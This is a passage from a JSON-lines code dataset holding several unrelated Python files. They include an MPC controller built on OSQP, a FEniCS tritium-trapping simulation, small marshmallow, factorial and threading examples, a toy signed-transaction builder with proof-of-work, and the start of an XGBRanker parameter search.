sparse.hstack([sparse.kron(sparse.eye(self.N + 1), self.C_x),\n sparse.csc_matrix(((self.N + 1) * self.ns, self.N * self.nu))])\n\n Aeq = sparse.hstack([Ax, Bu])\n else:\n # Input constraints:\n Aineq_u = sparse.hstack(\n [sparse.csc_matrix((self.N * self.nu, (self.N + 1) * self.nx)),\n sparse.eye(self.N * self.nu),\n sparse.csc_matrix((self.nu * self.N, self.ns * self.N))])\n\n # State constraints:\n Aineq_x = sparse.hstack([sparse.kron(sparse.eye(self.N + 1), self.C_x),\n sparse.csc_matrix(((self.N + 1) * self.ns, self.N * self.nu)),\n sparse.vstack([sparse.eye(self.ns * self.N),\n sparse.csc_matrix((self.ns, self.ns * self.N))])])\n\n Aeq = sparse.hstack([Ax, Bu, sparse.csc_matrix((self.nx * (self.N + 1), self.ns * (self.N)))])\n\n self._osqp_A = sparse.vstack([Aeq, Aineq_u, Aineq_x], format='csc')\n\n def construct_constraint_matrix_data_(self, A_lst, B_lst):\n \"\"\"\n Manually build csc_matrix.data array\n :param A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n :param B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n :return:\n \"\"\"\n C_data = [np.atleast_1d(self.C_x_dense[np.nonzero(self.C_x_dense[:, i]), i].squeeze()).tolist() for i in range(self.nx)]\n\n # State variables:\n data = []\n A_inds = []\n start_ind_A = 1\n for t in range(self.N):\n for i in range(self.nx):\n data.append(np.hstack((-np.ones(1), A_lst[t][:, i], np.array(C_data[i]))))\n A_inds.append(np.arange(start_ind_A, start_ind_A + self.nx))\n start_ind_A += self.nx + 1 + len(C_data[i])\n\n for i in range(self.nx):\n data.append(np.hstack((-np.ones(1), np.array(C_data[i]))))\n\n # Input variables:\n B_inds = []\n start_ind_B = start_ind_A + self.nx + np.nonzero(self.C_x_dense)[0].size - 1\n for t in range(self.N):\n for i in range(self.nu):\n data.append(np.hstack((B_lst[t][:, i], np.ones(1))))\n B_inds.append(np.arange(start_ind_B, start_ind_B + self.nx))\n start_ind_B += self.nx + 1\n\n # Slack variables:\n if self.add_slack:\n for t in range(self.N):\n for i in range(self.ns):\n data.append(np.ones(1))\n\n flat_data = []\n for arr in data:\n for d in arr:\n flat_data.append(d)\n\n self._osqp_A_data = np.array(flat_data)\n self._osqp_A_data_A_inds = np.array(A_inds).flatten().tolist()\n self._osqp_A_data_B_inds = np.array(B_inds).flatten().tolist()\n\n def update_constraint_matrix_data_(self):\n \"\"\"\n Manually update csc_matrix.data array\n :param A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n :param B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n :return:\n \"\"\"\n #self._osqp_A_data[self._osqp_A_data_A_inds] = self.A_stacked.flatten(order='F')\n #self._osqp_A_data[self._osqp_A_data_B_inds] = self.B_stacked.flatten(order='F')\n self._osqp_A_data[self._osqp_A_data_A_inds] = self.A_stacked\n self._osqp_A_data[self._osqp_A_data_B_inds] = self.B_stacked\n\n def construct_constraint_vecs_(self, z, t):\n \"\"\"\n Construct MPC constraint vectors (lower and upper bounds)\n :param z: (np.array) Current state\n :param t: (float) Current time (for time-dependent dynamics)\n :return:\n \"\"\"\n\n self.n_opt_x = self.nx * (self.N + 1)\n self.n_opt_x_u = self.nx * (self.N + 1) + self.nu * self.N\n\n dz0 = z - self.z_init[:, 0]\n leq = np.hstack([-dz0, -self.r_vec])\n ueq = leq\n\n # Input constraints:\n u_init_flat = self.u_init.flatten(order='F') # TODO: Check flattening ok\n self.umin_tiled = np.tile(self.umin, self.N)\n self.umax_tiled = np.tile(self.umax, self.N)\n lineq_u = self.umin_tiled - u_init_flat\n uineq_u = self.umax_tiled - u_init_flat\n\n # State constraints:\n x_init_flat = self.x_init.flatten(order='F')\n self.xmin_tiled = np.tile(self.xmin, self.N + 1)\n self.xmax_tiled = np.tile(self.xmax, self.N + 1)\n lineq_x = self.xmin_tiled - x_init_flat\n uineq_x = self.xmax_tiled - x_init_flat\n\n if self.terminal_constraint:\n raise Warning('Terminal constraint not implemented.')\n #lineq_x[-self.ns:] = self.xr - self.x_init[:, -1]\n #uineq_x[-self.ns:] = lineq_x[-self.ns:]\n\n self._osqp_l = np.hstack([leq, lineq_u, lineq_x])\n self._osqp_u = np.hstack([ueq, uineq_u, uineq_x])\n\n def update_constraint_vecs_(self, z, t):\n \"\"\"\n Update MPC constraint vectors (lower and upper bounds)\n :param z: (np.array) Current state\n :param t: (float) Current time (for time-dependent dynamics)\n :return:\n \"\"\"\n # Equality constraints:\n self._osqp_l[:self.nx] = -(z - self.z_init[:, 0])\n self._osqp_l[self.nx:self.nx * (self.N + 1)] = -self.r_vec\n\n self._osqp_u[:self.nx * (self.N + 1)] = self._osqp_l[:self.nx * (self.N + 1)]\n\n # Input constraints:\n self._osqp_l[self.n_opt_x:self.n_opt_x_u] = self.umin_tiled - self.u_init_flat\n self._osqp_u[self.n_opt_x:self.n_opt_x_u] = self.umax_tiled - self.u_init_flat\n\n # State constraints:\n self._osqp_l[self.n_opt_x_u:] = self.xmin_tiled - self.x_init_flat\n self._osqp_u[self.n_opt_x_u:] = self.xmax_tiled - self.x_init_flat\n\n if self.terminal_constraint:\n raise Warning('Terminal constraint not implemented.')\n #self._osqp_l[-self.ns:] = self.xr - self.x_init_flat[-self.ns:]\n #self._osqp_u[-self.ns:] = self._osqp_l[-self.ns:]\n\n def solve_mpc_(self):\n \"\"\"\n Solve the MPC sub-problem\n :return:\n \"\"\"\n if self.solver_settings['gen_embedded_ctrl']:\n self.prob_embed.update_lin_cost(self._osqp_q)\n self.prob_embed.update_lower_bound(self._osqp_l)\n self.prob_embed.update_upper_bound(self._osqp_u)\n self.prob_embed.update_A(self._osqp_A_data, None, 0)\n self.res = self.prob_embed.solve()\n self.dz_flat = self.res[0][:(self.N + 1) * self.nx]\n self.du_flat = self.res[0][(self.N + 1) * self.nx:(self.N + 1) * self.nx + self.nu * self.N]\n\n else:\n self.prob.update(q=self._osqp_q, Ax=self._osqp_A_data, l=self._osqp_l, u=self._osqp_u)\n self.res = self.prob.solve()\n self.dz_flat = self.res.x[:(self.N + 1) * self.nx]\n self.du_flat = self.res.x[(self.N + 1) * self.nx:(self.N + 1) * self.nx + self.nu * self.N]\n\n# if self.res.info.status != 'solved':\n# raise ValueError('OSQP did not solve the problem!', self.res.info.status)\n\n def update_initial_guess_(self):\n \"\"\"\n Update the intial guess of the solution (z_init, u_init)\n :return:\n \"\"\"\n z_last = self.cur_z[:, -1]\n u_new = self.cur_u[:, -1]\n z_new = self.dynamics_object.eval_dot(z_last, u_new, None)\n\n self.z_init[:, :-1] = self.cur_z[:, 1:]\n self.z_init[:, -1] = z_new\n\n self.u_init[:, :-1] = self.cur_u[:, 1:]\n self.u_init[:, -1] = u_new\n self.u_init_flat[:-self.nu] = self.u_init_flat[self.nu:]\n self.u_init_flat[-self.nu:] = u_new\n\n self.x_init = self.C_x_dense @ self.z_init\n self.x_init_flat = self.x_init.flatten(order='F')\n\n # Warm start of OSQP:\n #du_new = self.du_flat[-self.nu:]\n #dz_last = self.dz_flat[-self.nx:]\n #dz_new = self.dynamics_object.eval_dot(dz_last, du_new, None)\n #self.warm_start[:self.nx*self.N] = self.dz_flat[self.nx:]\n #self.warm_start[self.nx*self.N:self.nx*(self.N+1)] = dz_new\n #self.warm_start[self.nx*(self.N+1):-self.nu] = self.du_flat[self.nu:]\n #self.warm_start[-self.nu:] = du_new\n\n def update_linearization_(self):\n \"\"\"\n Update the linearization of the dyanmics around the initial guess\n :return: A_lst: (list(np.array)) List of dynamics matrices, A, for each timestep in the prediction horizon\n B_lst: (list(np.array)) List of dynamics matrices, B, for each timestep in the prediction horizon\n \"\"\"\n for ii in range(self.N):\n a, b, r = self.dynamics_object.get_linearization(self.z_init[:, ii], self.z_init[:, ii + 1],\n self.u_init[:, ii], None)\n self.A_stacked[ii*self.nx**2:(ii+1)*self.nx**2] = a.flatten(order='F')\n self.B_stacked[ii * self.nx *self.nu:(ii + 1) * self.nx*self.nu] = b.flatten(order='F')\n self.r_vec[ii*self.nx:(ii+1)*self.nx] = r\n\n def construct_embedded_controller(self):\n try:\n self.prob_embed = importlib.import_module(self.embed_pkg_str)\n except ModuleNotFoundError:\n file_path = os.path.dirname(os.path.realpath(__file__)) + '/embedded_controllers/' + self.embed_pkg_str\n self.prob.codegen(file_path, parameters='matrices', python_ext_name=self.embed_pkg_str, force_rewrite=True)\n self.prob_embed = importlib.import_module(self.embed_pkg_str)\n\n def get_state_prediction(self):\n \"\"\"\n Get the state prediction from the MPC problem\n :return: Z (np.array) current state prediction\n \"\"\"\n return self.cur_z\n\n def get_control_prediction(self):\n \"\"\"\n Get the control prediction from the MPC problem\n :return: U (np.array) current control prediction\n \"\"\"\n return self.cur_u\n\n def initialize_numba(self, x, t):\n \"\"\"\n Initialize Numba compilation of online controller components:\n \"\"\"\n\n self.prepare_eval(0.)\n self.eval(x, t)\n self.comp_time = []\n self.prep_time = []\n\n","sub_path":"koopman_core/controllers/nmpc_traj_controller_numba.py","file_name":"nmpc_traj_controller_numba.py","file_ext":"py","file_size_in_byte":27539,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"619469232","text":"from fenics import *\nfrom dolfin import *\nimport numpy as np\nimport csv\nimport sys\nimport os\nimport argparse\n\n\ndef save_as():\n '''\n - parameters : none\n - returns filedescription : string of the saving path\n '''\n valid = False\n while valid is False:\n print(\"Save as (.csv):\")\n filedesorption = input()\n if filedesorption == '':\n filedesorption = \"desorption.csv\"\n if filedesorption.endswith('.csv'):\n valid = True\n try:\n with open(filedesorption, 'r') as f:\n print('This file already exists.'\n ' Do you want to replace it ? (y/n)')\n choice = input()\n if choice == \"n\" or choice == \"N\":\n valid = False\n elif choice != \"y\" and choice != \"Y\":\n valid = False\n except:\n valid = True\n else:\n print(\"Please enter a file ending with the extension .csv\")\n valid = False\n return filedesorption\n\n\ndef export_TDS(filedesorption):\n '''\n - filedesorption : string, the path of the csv file.\n '''\n busy = True\n while busy is True:\n try:\n with open(filedesorption, \"w+\") as output:\n busy = False\n writer = csv.writer(output, lineterminator='\\n')\n writer.writerows(['dTt'])\n for val in desorption:\n writer.writerows([val])\n except:\n print(\"The file \" + filedesorption + \" is currently busy.\"\n \"Please close the application then press any key\")\n input()\n return\n\n\ndef calculate_D(T, E, D_0):\n '''\n Calculate the diffusion coeff at a certain temperature\n and for a specific material (subdomain)\n Arguments:\n - T : float, temperature\n - E : float, diffusion energy\n - D_0 : float, diffusion pre-exponential factor\n Returns : float, the diffusion coefficient\n '''\n coefficient = D_0 * exp(-E/k_B/T)\n\n return coefficient\n\n\ndef update_D(mesh, volume_markers, materials, T):\n '''\n Iterates through the mesh and compute the value of D\n Arguments:\n - mesh : the mesh\n - volume_markers : MeshFunction that contains the subdomains\n - T : float, the temperature\n Returns : the Function D\n '''\n D = Function(V0)\n for cell in cells(mesh):\n volume_id = volume_markers[cell]\n found = False\n for material in materials:\n if volume_id == material[\"id\"]:\n found = True\n D.vector()[cell.index()] = \\\n calculate_D(T, material['E_diff'], material['D_0'])\n break\n if found is False:\n print('Computing D: Volume ID not found')\n return D\n\n\ndef update_alpha(mesh, volume_markers, materials):\n '''\n Iterates through the mesh and compute the value of D\n Arguments:\n - mesh : the mesh\n - volume_markers : MeshFunction that contains the subdomains\n - materials : list, contains all the materials dictionaries\n\n Returns : the Function alpha\n '''\n alpha = Function(V0)\n for cell in cells(mesh):\n volume_id = volume_markers[cell]\n found = False\n for material in materials:\n if volume_id == material[\"id\"]:\n found = True\n alpha.vector()[cell.index()] = material['alpha']\n break\n if found is False:\n print('Computing alpha: Volume ID not found')\n return alpha\n\n\ndef update_beta(mesh, volume_markers, materials):\n '''\n Iterates through the mesh and compute the value of D\n Arguments:\n - mesh : the mesh\n - volume_markers : MeshFunction that contains the subdomains\n - materials : list, contains all the materials dictionaries\n\n Returns : the Function beta\n '''\n beta = Function(V0)\n for cell in cells(mesh):\n volume_id = volume_markers[cell]\n found = False\n for material in materials:\n if volume_id == material[\"id\"]:\n found = True\n beta.vector()[cell.index()] = material['beta']\n break\n if found is False:\n print('Computing beta: Volume ID not found')\n return beta\n\n\ndef formulation(traps, solutions, testfunctions, previous_solutions):\n ''' formulation takes traps as argument (list).\n Parameters:\n - traps : dict, contains the energy, density and domains\n of the traps\n - solutions : list, contains the solution fields\n - testfunctions : list, contains the testfunctions\n - previous_solutions : list, contains the previous solution fields\n\n Returns:\n - F : variational formulation\n '''\n transient_sol = ((u_1 - u_n1) / dt)*v_1*dx\n diff_sol = D*dot(grad(u_1), grad(v_1))*dx\n source_sol = - (1-r)*flux_*f*v_1*dx\n\n F = 0\n F += transient_sol + source_sol + diff_sol\n i = 1\n for trap in traps:\n trap_density = trap['density']\n energy = trap['energy']\n F += ((solutions[i] - previous_solutions[i]) / dt)*testfunctions[i]*dx\n if type(trap['materials']) is list:\n for subdomain in trap['materials']:\n F += - D/alpha/alpha/beta*u_1*(trap_density - solutions[i])*testfunctions[i]*dx(subdomain)\n F += v_0*exp(-energy/k_B/temp)*solutions[i]*testfunctions[i]*dx(subdomain)\n else:\n subdomain = trap['materials']\n F += - D/alpha/alpha/beta*u_1*(trap_density - solutions[i])*testfunctions[i]*dx(subdomain)\n F += v_0*exp(-energy/k_B/temp)*solutions[i]*testfunctions[i]*dx(subdomain)\n F += ((solutions[i] - previous_solutions[i]) / dt)*v_1*dx\n i += 1\n return F\n\n\ndef subdomains(mesh, materials):\n '''\n Iterates through the mesh and mark them\n based on their position in the domain\n Arguments:\n - mesh : the mesh\n - materials : list, contains the dictionaries of the materials\n Returns :\n - volume_markers : MeshFunction that contains the subdomains\n (0 if no domain was found)\n - measurement : the measurement dx based on volume_markers\n '''\n volume_markers = MeshFunction(\"size_t\", mesh, mesh.topology().dim(), 0)\n for cell in cells(mesh):\n for material in materials:\n if cell.midpoint().x() >= material['borders'][0] \\\n and cell.midpoint().x() <= material['borders'][1]:\n volume_markers[cell] = material['id']\n\n measurement = dx(subdomain_data=volume_markers)\n return volume_markers, measurement\n\n\ndef define_materials():\n '''\n Create a list of dicts corresponding to the different materials\n and containing properties.\n Returns:\n -materials : list of dicts corresponding to the different materials\n and containing properties.\n '''\n materials = []\n material1 = {\n \"alpha\": Constant(1.1e-10), # lattice constant ()\n \"beta\": Constant(6*6.3e28), # number of solute sites per atom (6 for W)\n \"density\": 6.3e28,\n \"borders\": [0, 0.25e-6],\n \"E_diff\": 0.39,\n \"D_0\": 4.1e-7,\n \"id\": 1\n }\n material2 = {\n \"alpha\": Constant(1.1e-10),\n \"beta\": Constant(6*6.3e28),\n \"density\": 6.3e28,\n \"borders\": [0.25e-6, size],\n \"E_diff\": 0.39,\n \"D_0\": 4.1e-7,\n \"id\": 2\n }\n materials = [material1, material2]\n return materials\n\n\ndef define_traps(n_trap_3_n):\n '''\n Create a list of dicts corresponding to the different traps\n and containing properties.\n Arguments:\n - n_trap_3_n : Function(W), only required if extrinsic trap is\n simulated.\n Returns:\n -materials : list of dicts corresponding to the different traps\n and containing properties.\n '''\n trap_1 = {\n \"energy\": 0.87,\n \"density\": 1.3e-3*6.3e28,\n \"materials\": [1, 2]\n }\n trap_2 = {\n \"energy\": 1.0,\n \"density\": 4e-4*6.3e28,\n \"materials\": [1, 2]\n }\n trap_3 = {\n \"energy\": 1.5,\n \"density\": n_trap_3_,\n \"materials\": [1, 2]\n }\n\n traps = [trap_1, trap_2, trap_3]\n return traps\n\n\ndef mesh_and_refine(mesh_parameters):\n '''\n Mesh and refine iteratively until meeting the refinement\n conditions.\n Arguments:\n - mesh_parameters : dict, contains initial number of cells, size,\n and refinements (number of cells and position)\n Returns:\n - mesh : the refined mesh.\n '''\n print('Meshing ...')\n initial_number_of_cells = mesh_parameters[\"initial_number_of_cells\"]\n size = mesh_parameters[\"size\"]\n mesh = IntervalMesh(initial_number_of_cells, 0, size)\n if \"refinements\" in mesh_parameters:\n for refinement in mesh_parameters[\"refinements\"]:\n nb_cells_ref = refinement[\"cells\"]\n refinement_point = refinement[\"x\"]\n print(\"Mesh size before local refinement is \" + str(len(mesh.cells())))\n while len(mesh.cells()) < initial_number_of_cells + nb_cells_ref:\n cell_markers = MeshFunction(\"bool\", mesh, mesh.topology().dim())\n cell_markers.set_all(False)\n for cell in cells(mesh):\n if cell.midpoint().x() < refinement_point:\n cell_markers[cell] = True\n mesh = refine(mesh, cell_markers)\n print(\"Mesh size after local refinement is \" + str(len(mesh.cells())))\n initial_number_of_cells = len(mesh.cells())\n else:\n print('No refinement parameters found')\n\n return mesh\n\n\n# Declaration of variables\n\nmesh_parameters = {\n \"initial_number_of_cells\": 20,\n \"size\": 20e-6,\n \"refinements\": [\n {\n \"cells\": 1500,\n \"x\": 3e-6\n },\n {\n \"cells\": 100,\n \"x\": 10e-9\n }\n ],\n }\nimplantation_time = 400.0\nresting_time = 50\nramp = 8\ndelta_TDS = 500\nr = 0\nflux = 2.5e19 # /6.3e28\nn_trap_3a_max = 1e-1*Constant(6.3e28)\nn_trap_3b_max = 1e-2*Constant(6.3e28)\nrate_3a = 6e-4\nrate_3b = 2e-4\nxp = 1e-6\nsize = mesh_parameters[\"size\"]\n\nv_0 = 1e13 # frequency factor s-1\nk_B = 8.6e-5 # Boltzmann constant\n\n# Mesh and refinement\nmaterials = define_materials()\n\nTDS_time = int(delta_TDS / ramp) + 1\nTime = implantation_time+resting_time+TDS_time\nnum_steps = 2*int(implantation_time+resting_time+TDS_time)\nk = Time / num_steps # time step size\ndt = Constant(k)\nt = 0 # Initialising time to 0s\n\nmesh = mesh_and_refine(mesh_parameters)\n# Define function space for system of concentrations and properties\nP1 = FiniteElement('P', interval, 1)\nelement = MixedElement([P1, P1, P1, P1])\nV = FunctionSpace(mesh, element)\nW = FunctionSpace(mesh, 'P', 1)\nV0 = FunctionSpace(mesh, 'DG', 0)\n\n# Define and mark subdomains\nvolume_markers, dx = subdomains(mesh, materials)\n\n# BCs\nprint('Defining boundary conditions')\n\n\ndef inside(x, on_boundary):\n return on_boundary and (near(x[0], 0))\n\n\ndef outside(x, on_boundary):\n return on_boundary and (near(x[0], size))\n# #Tritium concentration\ninside_bc_c = Expression(('0', '0', '0', '0'), t=0, degree=1)\nbci_c = DirichletBC(V, inside_bc_c, inside)\nbco_c = DirichletBC(V, inside_bc_c, outside)\nbcs = [bci_c, bco_c]\n\n\n# Define test functions\nv_1, v_2, v_3, v_4 = TestFunctions(V)\ntestfunctions = [v_1, v_2, v_3, v_4]\nv_trap_3 = TestFunction(W)\n\nu = Function(V)\nn_trap_3 = TrialFunction(W) # trap 3 density\n\n# Split system functions to access components\nu_1, u_2, u_3, u_4 = split(u)\nsolutions = [u_1, u_2, u_3, u_4]\n\nprint('Defining initial values')\nini_u = Expression((\"0\", \"0\", \"0\", \"0\"), degree=1)\nu_n = interpolate(ini_u, V)\nu_n1, u_n2, u_n3, u_n4 = split(u_n)\nprevious_solutions = [u_n1, u_n2, u_n3, u_n4]\n\nini_n_trap_3 = Expression(\"0\", degree=1)\nn_trap_3_n = interpolate(ini_n_trap_3, W)\nn_trap_3_ = Function(W)\n\n# Define expressions used in variational forms\nprint('Defining source terms')\nf = Expression('1/(2.5e-9*pow(2*3.14,0.5))* \\\n exp(-0.5*pow(((x[0]-4.5e-9)/2.5e-9), 2))',\n degree=2) # This is the tritium volumetric source term\nteta = Expression('x[0] < xp ? 1/xp : 0',\n xp=xp, degree=1)\nflux_ = Expression('t <= implantation_time ? flux : 0',\n t=0, implantation_time=implantation_time,\n flux=flux, degree=1)\n\nprint('Defining variational problem')\ntemp = Expression('t <= (implantation_time+resting_time) ? \\\n 300 : 300+ramp*(t-(implantation_time+resting_time))',\n implantation_time=implantation_time,\n resting_time=resting_time,\n ramp=ramp,\n t=0, degree=2)\nD = update_D(mesh, volume_markers, materials, temp(size/2))\nalpha = update_alpha(mesh, volume_markers, materials)\nbeta = update_beta(mesh, volume_markers, materials)\n\ntraps = define_traps(n_trap_3_)\n\n# Define variational problem\n\nF = formulation(traps, solutions, testfunctions, previous_solutions)\n\nF_n3 = ((n_trap_3 - n_trap_3_n)/dt)*v_trap_3*dx\nF_n3 += -(1-r)*flux_*((1 - n_trap_3_n/n_trap_3a_max)*rate_3a*f + (1 - n_trap_3_n/n_trap_3b_max)*rate_3b*teta)*v_trap_3 * dx\n\n# Solution files\nxdmf_u_1 = XDMFFile('Solution/c_sol.xdmf')\nxdmf_u_2 = XDMFFile('Solution/c_trap1.xdmf')\nxdmf_u_3 = XDMFFile('Solution/c_trap2.xdmf')\nxdmf_u_4 = XDMFFile('Solution/c_trap3.xdmf')\nfiledesorption = save_as()\n\n# Time-stepping\nprint('Time stepping...')\ntotal_n = 0\ndesorption = list()\n\nset_log_level(30) # Set the log level to WARNING\n#set_log_level(20) # Set the log level to INFO\n\n\nfor n in range(num_steps):\n # Update current time\n t += k\n temp.t += k\n flux_.t += k\n if t > implantation_time:\n D = update_D(mesh, volume_markers, materials, temp(size/2))\n print(str(round(t/Time*100, 2)) + ' % ' + str(round(t, 1)) + ' s',\n end=\"\\r\")\n solve(F == 0, u, bcs,\n solver_parameters={\"newton_solver\": {\"absolute_tolerance\": 1e-19}})\n\n solve(lhs(F_n3) == rhs(F_n3), n_trap_3_, [])\n _u_1, _u_2, _u_3, _u_4 = u.split()\n\n # Save solution to file (.xdmf)\n _u_1.rename(\"solute\", \"label\")\n _u_2.rename(\"trap_1\", \"label\")\n _u_3.rename(\"trap_2\", \"label\")\n _u_4.rename(\"trap_3\", \"label\")\n xdmf_u_1.write(_u_1, t)\n xdmf_u_2.write(_u_2, t)\n xdmf_u_3.write(_u_3, t)\n xdmf_u_4.write(_u_4, t)\n\n total_trap1 = assemble(_u_2*dx)\n total_trap2 = assemble(_u_3*dx)\n total_trap3 = assemble(_u_4*dx)\n total_trap = total_trap1 + total_trap2 + total_trap3\n total_sol = assemble(_u_1*dx)\n total = total_trap + total_sol\n desorption_rate = [-(total-total_n)/k, temp(size/2), t]\n total_n = total\n if t > implantation_time+resting_time:\n desorption.append(desorption_rate)\n\n # Update previous solutions\n u_n.assign(u)\n n_trap_3_n.assign(n_trap_3_)\n\nexport_TDS(filedesorption)\n","sub_path":"Main/ttrap.py","file_name":"ttrap.py","file_ext":"py","file_size_in_byte":14769,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"557564889","text":"import unittest\nfrom macros.models import query_cache\nfrom macros.libs import wa_processing\nfrom macros.libs import wap\nfrom macros.settings import test_settings\n\nclass TestNutritionExtractor:\n \n def setUp(self):\n self.Session, self.engine = db_connect(app_settings=test_settings)\n newQuery = query_cache.QueryCacheModel(\"my Q\", \"my Response\")\n Base.metadata.drop_all(self.engine)\n Base.metadata.create_all(self.engine)\n self.session = self.Session()\n self.session.add(newQuery)\n self.session.commit()\n\n def test_read_from_cache(self):\n \"\"\"Check if a query is in the cache\"\"\"\n return\n\n def tearDown(self):\n Base.metadata.drop_all(self.engine)\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"macros/tests/libs/test_extractor.py","file_name":"test_extractor.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"568621856","text":"from marshmallow import ValidationError, fields, Schema, post_load\n\n\nclass User:\n\n def __init__(self, name, email, created_at):\n self.name = name\n self.email = email\n self.created_at = created_at\n\n\nclass UserSchema(Schema):\n name = fields.Str()\n email = fields.Email()\n created_at = fields.DateTime()\n\n @post_load\n def make_user(self, data, **kwargs):\n return User(**data)\n\ntry:\n result = UserSchema().load({\"name\": \"John\", \"email\": \"foo\"})\nexcept ValidationError as err:\n print(err.messages) # => {\"email\": ['\"foo\" is not a valid email address.']}\n print(err.valid_data) # => {\"name\": \"John\"}","sub_path":"test/test_marshmallow/test_validate_err.py","file_name":"test_validate_err.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"222945391","text":"import functools\nimport operator\n\nproduct = functools.partial(functools.reduce, operator.mul)\n\ndef factorial(n):\n \"\"\"Implementation of Binary-Split Factorial algorithm\n\n See http://www.luschny.de/math/factorial/binarysplitfact.html\n\n >>> f = 1\n >>> for n in range(1, 1001):\n ... f *= n\n ... assert(factorial(n) == f)\n \"\"\"\n if n < 3:\n return [1, 1, 2][n]\n _, r = loop(n)\n return r << (n - count_bits(n))\n\ndef loop_iter(n):\n p = r = 1\n s = n.bit_length() - 2\n i = s - 1 + (n >> s & 1)\n while i >= 0:\n m = n >> i\n p *= partial_product((m >> 2) + (m >> 1 & 1), \n (m >> 1) + (m & 1))\n r *= p\n i -= 1\n return p, r\n\ndef loop(n):\n p = r = 1\n if n > 2:\n p, r = loop(n >> 1)\n p *= partial_product((n >> 2) + (n >> 1 & 1), \n (n >> 1) + (n & 1))\n r *= p\n assert(n < 3 or (p, r) == loop_iter(n)) \n return p, r\n\ndef partial_product(start, stop):\n length = stop - start\n if length == 1:\n return start << 1 | 1\n if length == 2:\n x = (start << 1 | 1)\n return x * (x + 2)\n middle = start + (length >> 1) \n return partial_product(start, middle) * partial_product(middle, stop)\n\ndef count_bits(n):\n return bin(n).count('1')\n\nif __name__ == '__main__':\n print(factorial(10))\n","sub_path":"raw/fast_factorial.py","file_name":"fast_factorial.py","file_ext":"py","file_size_in_byte":1373,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"421163789","text":"from twofish import Twofish\nimport pickle\nimport secrets\nfrom transactions import transaction\nfrom wallets import ed25519_wallet as wallet\n\ndef payload(*args):\n return {\n 'to' : args[0],\n 'from' : args[1],\n 'amount' : args[2]\n }\n\ndef metadata(payload, s):\n payload = pickle.dumps(payload)\n return {\n 'signature' : wallet.sign(s, payload),\n 'proof' : find_nonce(payload)[0]\n }\n\ndef build(**kwargs):\n to = kwargs['to']\n v = kwargs['v']\n amount = kwargs['amount']\n s = kwargs['s']\n\n p = payload(to, v, amount)\n m = metadata(p, s)\n return {\n 'payload' : p,\n 'metadata' : m\n }\n\ndef find_nonce(o):\n T = Twofish(o[0:32])\n x = secrets.token_bytes(16)\n secret = secrets.token_bytes(16)\n while x.hex()[0:3] != '000':\n secret = secrets.token_bytes(16)\n x = T.encrypt(secret)\n\n return secret.hex(), x.hex()\n\ndef check_proof(o, proof):\n o = pickle.dumps(o)\n T = Twofish(o[0:32])\n x = T.encrypt(bytes.fromhex(proof))\n if x.hex()[0:3] == '000':\n return True\n return False","sub_path":"transactions/ed25519_transaction.py","file_name":"ed25519_transaction.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"152622423","text":"# coding=utf-8\nfrom threading import Thread,Lock\nimport time\n\nlock1 = Lock()\nlock2 = Lock()\nlock2.acquire()\nlock3 = Lock()\nlock3.acquire()\n\nclass Task1(Thread):\n def run(self):\n while True:\n if(lock1.acquire()):\n print('task1 -run')\n time.sleep(0.3)\n lock2.release()\n\nclass Task2(Thread):\n def run(self):\n while True:\n if(lock2.acquire()):\n print('task2 -run')\n time.sleep(0.3)\n lock3.release()\n\nclass Task3(Thread):\n def run(self):\n while True:\n if(lock3.acquire()):\n print('task3 -run')\n time.sleep(0.3)\n lock1.release()\n\n\nif __name__ == '__main__':\n t1 = Task1()\n t2 = Task2()\n t3 = Task3()\n t1.start()\n t2.start()\n t3.start()","sub_path":"code/01.多线程/08.多个线程按顺序执行.py","file_name":"08.多个线程按顺序执行.py","file_ext":"py","file_size_in_byte":845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"}
+{"seq_id":"336457106","text":"import sys\nimport time\nfrom collections import Counter\nfrom multiprocessing import cpu_count\n\nimport numpy as np\nimport xgboost as xgb\nfrom sklearn.model_selection import StratifiedKFold, train_test_split\n\n\ndef RandomSearch(feature, label, group, metrics, iter_num=1000, scoring=0.5, cv=5, cv_num=3,\n metrics_min=True, speedy=True, speedy_param=(20000, 0.3), gpu=False):\n \"\"\"XGBRanker model params search use RandomSearch method.\n \n Args:\n feature: pandas dataframe, model's feature.\n label: pandas series, model's label.\n loss: XGBRanker param 'objective'.\n metrics: model metrics function.\n scoring: metrics error opt base line value.\n cv: cross validation fold.\n cv_num: minimum cross validation fold.\n metrics_min: metrics value whether the smaller the better.\n speedy: whether use speedy method.\n speedy_param: if use speedy method, test_size will be set, \n test_size = 1-round(min(speedy_param[0], feature.shape[0]*speedy_param[1])/feature.shape[0], 2).\n gpu: whether use gpu.\n Returns:\n a best XGBRanker model params dict.\n Raises:\n params error.\n \"\"\"\n start = time.time()\n if gpu:\n raise \"XGBRanker is not supported currently.\"\n best_params={}\n if speedy:\n test_size = 1-round(min(speedy_param[0], feature.shape[0]*speedy_param[1])/feature.shape[0], 2)\n tree_method = 'gpu_hist' if gpu else 'auto'\n n_job = 1 if gpu else int(np.ceil(cpu_count()*0.9))\n weight_dict = Counter(label)\n if len(weight_dict)==2:\n weight = int(np.ceil(weight_dict[min(weight_dict)]/weight_dict[max(weight_dict)]))\n else:\n weight_dict = {j:i for i,j in weight_dict.items()}\n weight = int(np.ceil(weight_dict[max(weight_dict)]/weight_dict[min(weight_dict)]))\n for i in range(1, iter_num+1):\n params = {'learning_rate': np.random.choice(np.linspace(0.01, 0.1, 10).round(2)),\n 'n_estimators': np.random.choice(list(range(100, 850, 50))),\n 'max_depth': int(np.random.choice(np.linspace(3, 7, 5))),\n 